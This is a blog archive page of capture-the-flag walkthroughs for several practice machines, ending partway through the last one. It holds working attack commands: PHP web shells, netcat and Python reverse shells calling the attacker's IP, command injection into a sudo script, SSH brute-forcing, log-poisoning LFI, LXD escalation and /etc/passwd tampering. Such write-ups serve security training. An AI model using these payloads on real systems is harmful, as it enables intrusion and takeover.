月度归档:2021年05月

HackMyVm Momentum2 Walkthrough

发表评论

HackMyVm Momentum2 Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Momentum2

Scan ports.

 nmap -sV -sC -p- 192.168.56.99  -oN ports.log                                      sudo-0 | 0 [15:05:51]
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-31 15:05 CST
 Nmap scan report for localhost (192.168.56.99)
 Host is up (0.0013s latency).
 Not shown: 65533 closed ports
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 02:32:8e:5b:27:a8:ea:f2:fe:11:db:2f:57:f4:11:7e (RSA)
 |   256 74:35:c8:fb:96:c1:9f:a0:dc:73:6c:cd:83:52:bf:b7 (ECDSA)
 |_  256 fc:4a:70:fb:b9:7d:32:89:35:0a:45:3d:d9:8b:c5:95 (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Momentum 2 | Index
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80.

gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================                  
 /index.html           (Status: 200) [Size: 1428]
 /img                  (Status: 301) [Size: 314] [--> http://192.168.56.100/img/]
 /css                  (Status: 301) [Size: 314] [--> http://192.168.56.100/css/]
 /ajax.php.bak         (Status: 200) [Size: 357]                                
 /ajax.php             (Status: 200) [Size: 0]                                  
 /manual               (Status: 301) [Size: 317] [--> http://192.168.56.100/manual/]
 /js                   (Status: 301) [Size: 313] [--> http://192.168.56.100/js/]    
 /dashboard.html       (Status: 200) [Size: 513]                                    
 /owls                 (Status: 301) [Size: 315] [--> http://192.168.56.100/owls/]

Check ajax.php.bak. We need to set some parameter to upload php file.

 cat ajax.php.bak  
     //The boss told me to add one more Upper Case letter at the end of the cookie
    if(isset($_COOKIE['admin']) && $_COOKIE['admin'] == '&G6u@B6uDXMq&Ms'){
        //[+] Add if $_POST['secure'] == 'val1d'
         $valid_ext = array("pdf","php","txt");
    }
    else{
         $valid_ext = array("txt");
    }
    // Remember success upload returns 1 ⏎

Generate dic file of cookies.

 for c in {A..Z}; do echo '&G6u@B6uDXMq&Ms'$c >> cookie.txt; done

Create cmd.php with shell code in it.

 cat cmd.php                                                                                                                                                                                   fish-0 | 0 [21:02:13]
 <?php
 system($_GET["cmd"])
 ?>

Go to /dashboard.html, choose cmd.php, click upload, and capture the request with burpsuite.

[image-20210531210127178.png]

Send the request to Repeater, add cookie "admin=xxx", which we will bruteforce later, and add parameter "secure=val1d". Take care, it's not valid. If we click send now, response code will be 0, which means failed.

[image-20210531212540903.png]

Then send it to intruder, add §§ sign to admin=§xxxxx§.

[image-20210531213130392.png]

Set payload as cookie.txt we just generated.

image-20210531213158667 [image-20210531213158667.png]

Click start attack. Then we get the right cookie with response code 1.

[image-20210531213313743.png]

And cmd.php has been uploaded to /owls.

[image-20210531213353093.png]

Check if cmd.php works OK.

 ~ curl 'http://192.168.56.99/owls/cmd.php?cmd=id'    
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

We can get reverse shell.

 curl 'http://192.168.56.99/owls/cmd.php?cmd=nc%20192.168.56.150%201234%20-e%20/bin/bash'
 -------------------------------------------------------------------------------------------------------
 nc -nlvp 1234                                                                    fish-0 | 130 [15:44:34]
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.99.
 Ncat: Connection from 192.168.56.99:37994.
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

In athena's home folder, found password hint.

 www-data@momentum2:/home/athena$ cat password-reminder.txt
 cat password-reminder.txt
 password : myvulnerableapp[Asterisk]

Asterisk mark (*) means any character, we generate a dic.

```
crunch 16 16 -t myvulnerableapp@ > dic.txt
crunch 16 16 -t myvulnerableapp% >> dic.txt
crunch 16 16 -t myvulnerableapp, >> dic.txt
crunch 16 16 -t myvulnerableapp^ >> dic.txt


Bruteforce ssh with user name athena and this dic.

hydra -l athena -P dic.txt 192.168.56.99 ssh -f fish-0 | 0 [15:25:54]
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-31 15:26:17
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 95 login tries (l:1/p:95), ~6 tries per task
[DATA] attacking ssh://192.168.56.99:22/
[22][ssh] host: 192.168.56.99 login: athena password: myvulnerableapp*


Ssh login as athena, check sudo.

athena@momentum2:~$ sudo -l
Matching Defaults entries for athena on momentum2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User athena may run the following commands on momentum2:
(root) NOPASSWD: /usr/bin/python3 /home/team-tasks/cookie-gen.py


Run the py file, when asked for input seed, input shell code.

sudo python3 /home/team-tasks/cookie-gen.py
~ Random Cookie Generation ~
[!] for security reasons we keep logs about cookie seeds.
Enter the seed : ;nc 192.168.56.150 1234 -e /bin/sh;


Listen to the port just input at another terminal, and get root shell.

nc -nvlp 1234 man-0 | 0 [15:32:06]
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.99.
Ncat: Connection from 192.168.56.99:37992.
id
uid=0(root) gid=0(root) groups=0(root)

HackMyVm Hidden Walkthrough

发表评论

HackMyVm Hidden Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Hidden

Scan ports.

 nmap -sV -sC -p- 192.168.56.99  -oN ports.log                                     sudo-0 | 0 [14:50:06]
 ...
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 b8:10:9f:60:e6:2b:62:cb:3a:8c:8c:60:4b:1d:99:b9 (RSA)
 |   256 64:b5:b8:e6:0f:79:23:4d:4a:c0:9b:0f:a7:75:67:c9 (ECDSA)
 |_  256 d1:11:e4:07:8a:fe:06:72:64:62:28:ca:e3:29:7b:a0 (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Level 1
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80.

 cat 80.log                                                                         fish-0 | 0 [19:39:15]
 /index.html           (Status: 200) [Size: 392]

Check index.html, found a png file and some hints.

[image-20210531194036612.png]

     <body>
         <h1><center>Welcome to level 1</center></h1>
          <center><img src="decodethis_pls.png"></center>
     </body>
     <!-- format xxx.xxxxxx.xxx -->

The png is tic-tac-toe Cipher. Decode it online.

[image-20210531174854759.png]

Add sys.hidden.hmv to /etc/hosts. Scan port 80 again.

 gobuster dir -u http://sys.hidden.hmv -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard   -o sys.hidden.hmv.log
 ...
 /users                (Status: 301) [Size: 316] [--> http://sys.hidden.hmv/users/]
 /members              (Status: 301) [Size: 318] [--> http://sys.hidden.hmv/members/]
 /index.html           (Status: 200) [Size: 282]
 /weapon               (Status: 301) [Size: 317] [--> http://sys.hidden.hmv/weapon/]

Scan /weapon.

 gobuster dir -u http://sys.hidden.hmv/weapon -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard   -o weapon.log
 ...
 /index.html           (Status: 200) [Size: 0]
 /loot.php             (Status: 200) [Size: 0]

Fuzz loot.php.

 wfuzz -u 'http://sys.hidden.hmv/weapon/loot.php?FUZZ=id' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hh 0
  ...
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload                                  
 =====================================================================
 000008724:   200        1 L      3 W        54 Ch       "hack"

Check RCE.

 curl 'http://sys.hidden.hmv/weapon/loot.php?hack=id'                               fish-0 | 0 [18:08:52]
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

Get reverse shell as www-data.

curl 'http://sys.hidden.hmv/weapon/loot.php?hack=nc%20192.168.56.150%201234%20-e%20/bin/bash'

 nc -nlvp 1234                                                                      fish-0 | 0 [18:05:18]
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.99.
 Ncat: Connection from 192.168.56.99:39104.
 python3 -c 'import pty;pty.spawn("/bin/bash")'
 www-data@hidden:/var/www/hidden/weapon$

Check sudo.

 www-data@hidden:/home$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on hidden:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User www-data may run the following commands on hidden:
     (toreto) NOPASSWD: /usr/bin/perl

Get shell as toreto.

www-data@hidden:/home/toreto$ sudo -u toreto perl -e 'exec "/bin/bash";'
 sudo -u toreto perl -e 'exec "/bin/bash";'
 toreto@hidden:~$ id
 id
 uid=1001(toreto) gid=1000(toreto) groups=1000(toreto)

Upload id_rsa.pub in /home/toreto/.ssh, and rename it to authorized_keys, chmod 600.

```
toreto@hidden:~$ pwd
pwd
/home/toreto
toreto@hidden:~$ mkdir .ssh
mkdir .ssh
toreto@hidden:~$ cd .ssh
cd .ssh
toreto@hidden:~/.ssh$ wget http://192.168.56.150/id_rsa.pub -O authorized_keys
<http://192.168.56.150/id_rsa.pub -O authorized_keys
--2021-05-31 04:46:26-- http://192.168.56.150/id_rsa.pub
Connecting to 192.168.56.150:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 565 [application/x-mspublisher]
Saving to: ‘authorized_keys’
authorized_keys 100%[===================>] 565 --.-KB/s in 0s
2021-05-31 04:46:26 (9.01 MB/s) - ‘authorized_keys’ saved [565/565]
toreto@hidden:~/.ssh$ chmod 600 authorized_keys
chmod 600 authorized_keys


Then login ssh as toreto.

ssh toreto@192.168.56.99 fish-0 | 0 [19:42:48]
Enter passphrase for key '/home/kali/.ssh/id_rsa':
Linux hidden 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

 / ======= \
/ __________\
___
_____ ___

\=____/ Hack_MyVM - Hidden
/ """"""""""" \ -------------------
/ ::::::::::::: \
(____)

Congratulations!!! you have reached the last level!
Good Luck! 😉

Last login: Mon May 31 04:47:11 2021 from 192.168.56.150
toreto@hidden:~$


In /home/atenea/.hidden, found a dic file.

toreto@hidden:/home/atenea$ cd .hidden/
toreto@hidden:/home/atenea/.hidden$ ls -la
total 16
drwxr-xr-x 2 atenea atenea 4096 May 22 19:17 .
drwxr-xr-x 4 atenea atenea 4096 May 31 04:53 ..
-rw------- 1 toreto toreto 6170 May 22 19:11 atenea.txt


Bruteforce password of atenea.

hydra -l atenea -P atenea.txt 192.168.56.99 ssh -f nc-0 | 130 [19:29:55]
...
[STATUS] 161.00 tries/min, 161 tries in 00:01h, 401 to do in 00:03h, 16 active
[STATUS] 112.67 tries/min, 338 tries in 00:03h, 225 to do in 00:02h, 16 active
[22][ssh] host: 192.168.56.99 login: atenea password: sys8423hmv

Login as atenea, check sudo.

atenea@hidden:~$ sudo -l
Matching Defaults entries for atenea on hidden:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User atenea may run the following commands on hidden:
(root) NOPASSWD: /usr/bin/socat


Get root shell using socat.

atenea@hidden:~$ sudo socat stdin exec:/bin/bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
hidden

Vulnhub Prime (2021): 2 Walkthrough

发表评论

Vulnhub Prime (2021): 2 Walkthrough

https://www.vulnhub.com/entry/prime-2021-2,696/

Scan ports.

# Nmap 7.91 scan initiated Wed May 12 17:59:43 2021 as: nmap -sV -sC -p- -oN ports.log 192.168.33.139
 Nmap scan report for 192.168.33.139 (192.168.33.139)
 Host is up (0.0041s latency).
 Not shown: 65530 closed ports
 PORT      STATE SERVICE     VERSION
 22/tcp    open  ssh         OpenSSH 8.4p1 Ubuntu 5ubuntu1 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey:
 |   3072 0a:16:3f:c8:1a:7d:ff:f5:7a:66:05:63:76:7c:5a:95 (RSA)
 |   256 7f:47:44:cc:d1:c4:b7:54:de:4f:27:f2:39:38:ff:6e (ECDSA)
 |_  256 f5:d3:36:44:43:40:3d:11:9b:d1:a6:24:9f:99:93:f7 (ED25519)
 80/tcp    open  http        Apache httpd 2.4.46 ((Ubuntu))
 |_http-server-header: Apache/2.4.46 (Ubuntu)
 |_http-title: HackerCTF
 139/tcp   open  netbios-ssn Samba smbd 4.6.2
 445/tcp   open  netbios-ssn Samba smbd 4.6.2
 10123/tcp open  http        SimpleHTTPServer 0.6 (Python 3.9.4)
 |_http-server-header: SimpleHTTP/0.6 Python/3.9.4
 |_http-title: Directory listing for /
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

 Host script results:
 |_clock-skew: 7h59m59s
 |_nbstat: NetBIOS name: HACKERCTFLAB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 | smb2-security-mode:
 |   2.02:
 |_    Message signing enabled but not required
 | smb2-time:
 |   date: 2021-05-12T18:00:05
 |_  start_date: N/A

Check smb share folders.

 smbclient -L 192.168.33.139                                                                      fish-0 | 130 [08:45:41]
 Enter WORKGROUP\kali's password:

         Sharename       Type      Comment
         ---------       ----      -------
         print$          Disk      Printer Drivers
         welcome         Disk      Welcome to Hackerctf LAB
         IPC$            IPC       IPC Service (hackerctflab server (Samba, Ubuntu))
 SMB1 disabled -- no workgroup available

Found shell.php in /upload.

```
smbclient '\\192.168.33.139\welcome' fish-0 | 1 [08:47:16]
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu May 13 04:27:52 2021
.. D 0 Sat May 8 02:38:58 2021
.mysql_history H 18 Sat May 8 15:05:03 2021
.ssh DH 0 Thu May 13 04:29:18 2021
.profile H 807 Sat Mar 20 00:02:58 2021
upload D 0 Sun May 9 19:19:02 2021
.sudo_as_admin_successful H 0 Sat May 8 13:34:48 2021
.bash_logout H 220 Sat Mar 20 00:02:58 2021
.cache DH 0 Sat May 8 02:39:15 2021
something N 82 Sat May 8 00:18:09 2021
secrets N 0 Sat May 8 00:15:17 2021
.bash_history H 72 Sun May 9 19:23:26 2021
.bashrc H 3771 Sat Mar 20 00:02:58 2021

             19475088 blocks of size 1024. 9885876 blocks available

smb: \> cd upload
smb: \upload\> dir
. D 0 Sun May 9 19:19:02 2021
.. D 0 Thu May 13 04:27:52 2021
shell.php A 35 Sun May 9 19:19:02 2021

             19475088 blocks of size 1024. 9885872 blocks available

smb: \upload\> get shell.php
getting file \upload\shell.php of size 35 as shell.php (6.8 KiloBytes/sec) (average 6.8 KiloBytes/sec)
smb: \upload\>


Check shell.php.

cat shell.php smbclient-0 | 0 [08:48:39]
<?php echo system($_GET['cmd']);?>


Found user name jarves.

cat something fish-0 | 0 [09:29:34]
I wanted to make it my home directory. But idea must be changed.

Thanks,
jarves


Scan folders of port 80.

cat 80.log fish-0 | 0 [09:30:32]
/css (Status: 301) [Size: 314] [--> http://192.168.33.139/css/]
/server (Status: 301) [Size: 317] [--> http://192.168.33.139/server/]
/wp (Status: 301) [Size: 313] [--> http://192.168.33.139/wp/]
/index.html (Status: 200) [Size: 5761]
/images (Status: 301) [Size: 317] [--> http://192.168.33.139/images/]
/javascript (Status: 301) [Size: 321] [--> http://192.168.33.139/javascript/]


Check vulnerability of wordpress, found 1 user and 1 vulnerable plugin.
wpscan --url http://192.168.33.139/wp/ -e u,ap --no-banner --api-token yourtoken --force --plugins-detection aggressive
...
[+] gracemedia-media-player		 Location: http://192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/ Latest Version: 1.0 (up to date) Last Updated: 2013-07-21T15:09:00.000Z Readme: http://192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/readme.txt [!] Directory listing is enabled
Found By: Known Locations (Aggressive Detection)
- http://192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/, status: 200
[!] 1 vulnerability identified:
[!] Title: GraceMedia Media Player 1.0 - Local File Inclusion (LFI)
References:
- https://wpscan.com/vulnerability/a4f5b10f-3386-45cc-9548-dd7bbea199d6
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
- https://www.exploit-db.com/exploits/46537/
- https://seclists.org/fulldisclosure/2019/Mar/26

...
[i] User(s) Identified:

[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)


The plugin has LFI vulnerability.

searchsploit gracemedia

Exploit Title Path
WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion php/webapps/46537.txt 

Check if LFI works.

curl '192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds
&cfg=../../../../../../../../../../etc/passwd'
root:x:0:0:root:/root:/bin/bash
...
jarves:x:1000:1000:jarves:/home/jarves:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
...


Check if LFI works.

curl '192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)⏎


Visit the following address.

Visit http://192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.33.128%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27


Get reverse shell.

nc -nlvp 1234 ifconfig-0 | 0 [08:50:29]
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.33.139.
Ncat: Connection from 192.168.33.139:49084.
bash: cannot set terminal process group (971): Inappropriate ioctl for device
bash: no job control in this shell
<t/plugins/gracemedia-media-player/templates/files$

<t/plugins/gracemedia-media-player/templates/files$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)


Another way to directly get ssh login as jarves is to directly upload authorized_keys through smb.

smbclient '\\192.168.33.139\welcome'
...
smb: \> mkdir .ssh
smb: \> cd .ssh
smb: .ssh\> put authorized_keys
putting file authorized_keys as .ssh\authorized_keys (183.9 kb/s) (average 183.9 kb/s)
smb: .ssh\> chmod 600 authorized_keys
Server doesn't support UNIX CIFS calls.


Check group of jarves.

jarves@hackerctflab:~$ id
uid=1000(jarves) gid=1000(jarves) groups=1000(jarves),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)


Use the classic lxd vulnerability.

lxc image import ./alpine-v3.13-x86_64-20210405_2328.tar.gz --alias myimage
lxd init alpine:v3.12 mypool
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite


Now we are root.

jarves@hackerctflab:~$ lxc exec ignite /bin/sh
~ # id
uid=0(root) gid=0(root)


Upload authorized_keys to /root/.ssh, get ssh login directly.

ssh root@192.168.33.139
...
root@hackerctflab:~# id;hostname
uid=0(root) gid=0(root) groups=0(root)
hackerctflab

HackMyVm Broken Walkthrough

发表评论

HackMyVm Broken Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Broken

Scan ports.

 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 1b:8d:f3:e3:56:64:af:54:df:10:f8:39:ac:ad:c9:2f (RSA)
 |   256 77:c1:f3:e4:6b:96:0f:1e:5c:24:2e:4d:3e:4a:09:80 (ECDSA)
 |_  256 88:05:ef:7a:04:56:f0:59:62:a5:f8:40:32:24:8a:17 (ED25519)
 80/tcp open  http    nginx 1.14.2
 | http-robots.txt: 1 disallowed entry
 |_/textpattern
 |_http-server-header: nginx/1.14.2
 |_http-title: Site doesn't have a title (text/html).

Scan port 80.

 gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ...
 /index.html           (Status: 200) [Size: 3]
 /file.php             (Status: 200) [Size: 0]
 /robots.txt           (Status: 200) [Size: 23]

robots.txt told us there is textpattern cms.

 cat robots.txt  
 Disallow: /textpattern

Fuzz file.php for LFI.

 wfuzz -u 'http://broken/file.php?FUZZ=../../../../../etc/passwd' -w /usr/share/wordlists/seclists/Discov
 ery/Web-Content/big.txt --hh 0
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload                                  
 =====================================================================
 000007535:   200        27 L     40 W       1451 Ch     "file"

Check passwd.

 curl 'http://broken/file.php?file=../../../../etc/passwd'
 root:x:0:0:root:/root:/bin/bash
 ...
 heart:x:1000:1000:heart,,,:/home/heart:/bin/bash

...

Write shell code into nginx log file through agent string.

 curl 'http://broken' -A '<?php system($_GET[c]); ?>'  
 :(

Check if shell code works.

 curl 'http://broken/file.php?file=../../../../var/log/nginx/access.log&c=id'
 ...
 192.168.56.150 - - [26/May/2021:22:44:55 -0400] "GET / HTTP/1.1" 200 3 "-" "uid=33(www-data) gid=33(www-data) groups=33(www-data)

Try get reverse shell code.

 curl 'http://broken/file.php?file=../../../../var/log/nginx/access.log&c=nc%20192.168.56.150%201234%20-e%20/bin/bash'

In another terminal, listen to port and get shell.

 nc -nlvp 1234                                                                                                                                                                                 fish-0 | 0 [20:49:51]
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:50004.
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

Check sudo.

 ww-data@broken:~/html/textpattern/textpattern$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on broken:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User www-data may run the following commands on broken:
     (heart) NOPASSWD: /usr/bin/pydoc3.7

Run pydoc3.7 to get shell.

 www-data@broken:/home/heart$ sudo -u heart /usr/bin/pydoc3.7 os
 ...
 :!/bin/sh
 ...
 $ id
 id
 uid=1000(heart) gid=1000(heart) groups=1000(heart),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
 $ pwd
 pwd
 /home/heart
 $

Check sudo again.

 heart@broken:~$ sudo -l
 Matching Defaults entries for heart on broken:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User heart may run the following commands on broken:
     (ALL) NOPASSWD: /usr/bin/patch

Use patch to insert a new user root2 in /etc/passwd with root priviledge.

 heart@broken:~$ cp /etc/passwd ./passwd_new
 heart@broken:~$ openssl passwd mypass
 qQdUCJYw6ARL6
 heart@broken:~$ echo 'root2:qQdUCJYw6ARL6:0:0:root:/root:/bin/bash' >> passwd_new
 heart@broken:~$ diff -u /etc/passwd ./passwd_new > passwd_patch
 heart@broken:~$ sudo patch -i ./passwd_patch /etc/passwd
 patching file /etc/passwd
 heart@broken:~$ su root2
 Password:
 root@broken:/home/heart# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 broken
 root@broken:/home/heart#

HackMyVm BlackWidow Walkthrough

发表评论

HackMyVm BlackWidow Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=BlackWidow

Nmap scan ports.

 nmap -sV -sC -p- -oN ports.log 192.168.56.100

 Nmap scan report for 192.168.56.100 (192.168.56.100)                                                                  
 Host is up (0.0024s latency).
 Not shown: 65526 closed ports
 PORT      STATE SERVICE    VERSION
 22/tcp    open  ssh        OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 ...
 80/tcp    open  http       Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Site doesn't have a title (text/html).
 111/tcp   open  rpcbind    2-4 (RPC #100000)
 ...
 2049/tcp  open  nfs_acl    3 (RPC #100227)
 3128/tcp  open  http-proxy Squid http proxy 4.6
 |_http-server-header: squid/4.6
 |_http-title: ERROR: The requested URL could not be retrieved
 38425/tcp open  mountd     1-3 (RPC #100005)
 41727/tcp open  mountd     1-3 (RPC #100005)
 43429/tcp open  nlockmgr   1-4 (RPC #100021)
 55311/tcp open  mountd     1-3 (RPC #100005)
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Check port 80.

 ~ gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================
 /index.html           (Status: 200) [Size: 84]
 /docs                 (Status: 301) [Size: 315] [--> http://192.168.56.100/docs/]  
 /company              (Status: 301) [Size: 318] [--> http://192.168.56.100/company/]
 /js                   (Status: 301) [Size: 313] [--> http://192.168.56.100/js/]

Check /company, found started.php.

 ~ gobuster dir -u http://192.168.56.100/company -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
   -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard   -o 80_company.log
 ===============================================================
 /index.html           (Status: 200) [Size: 42271]
 /assets               (Status: 301) [Size: 325] [--> http://192.168.56.100/company/assets/]
 /forms                (Status: 301) [Size: 324] [--> http://192.168.56.100/company/forms/]
 /changelog.txt        (Status: 200) [Size: 1175]
 /Readme.txt           (Status: 200) [Size: 222]
 /started.php          (Status: 200) [Size: 42271]

Check sourcode of /company/index.html.

   <!-- =======================================================
   * Template Name: Arsha - v3.0.3
   * Template URL: https://bootstrapmade.com/arsha-free-bootstrap-html-template-corporate/
   * Author: BootstrapMade.com
   * License: https://bootstrapmade.com/license/
   ========================================================

   We are working to develop a php inclusion method using "file" parameter - Black Widow DevOps Team.

  -->

Wfuzz LFI of started.php with parameter file.

 ~ wfuzz -u 'http://192.168.56.100/company/started.php?file=FUZZ' -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest.txt --hh 0
  /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000000060:   200        29 L     43 W       1582 Ch     "../../../../../../../../../../../../../etc/passwd"            
 000000062:   200        29 L     43 W       1582 Ch     "../../../../../../../../../../../../../../../../etc/passwd"
 000000061:   200        29 L     43 W       1582 Ch     "../../../../../../../../../../../../../../etc/passwd"        
 000000403:   200        55 L     55 W       727 Ch      "../../../../../../../../../../../../../etc/group"            
 000000404:   200        55 L     55 W       727 Ch      "../../../../../../../../../../../../../../etc/group"

We can read /etc/passwd now.

 ~ curl 'http://192.168.56.100/company/started.php?file=../../../../../../../../../../../../../etc/passwd'
 root:x:0:0:root:/root:/bin/bash
 ...
 viper:x:1001:1001:Viper,,,:/home/viper:/bin/bash
 ...

Let's fuzz some log files which we can read.

 wfuzz -u "http://192.168.56.100/company/started.php?file=../../../../../../../../../../../../..FUZZ" -w /usr/share/wordlists/logfiles.txt                                                                        
 ...
 000000031:   200        0 L      0 W        0 Ch        "/var/log/vsftpd.log"
 000000030:   200        0 L      0 W        0 Ch        "/var/log/error.log"
 000000032:   200        0 L      0 W        0 Ch        "/var/log/message"
 000000023:   200        0 L      0 W        0 Ch        "/usr/local/apache/logs/error_log"
 000000025:   200        0 L      0 W        0 Ch        "/var/log/apache/error_log"
 000000026:   200        0 L      0 W        0 Ch        "/var/log/apache2/error_log"
 000000018:   500        0 L      0 W        0 Ch        "/var/log/apache2/access.log"

Take care the response code for /var/log/apache2/access.log is 500, all other file is 200. That's because we run gobuster many times, and access.log file is too big for curl. We reset the VM to original status. Then we can access the file through LFI.

Also, we noticed that browser agent string is in the log file, which can be modified to shell code.

 ~ curl 'http://192.168.56.100/company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log'
 192.168.56.150 - - [25/May/2021:04:24:36 -0400] "GET /company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 147 "-" "curl/7.74.0"
 192.168.56.150 - - [25/May/2021:04:24:40 -0400] "GET /company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 147 "-" "curl/7.74.0"
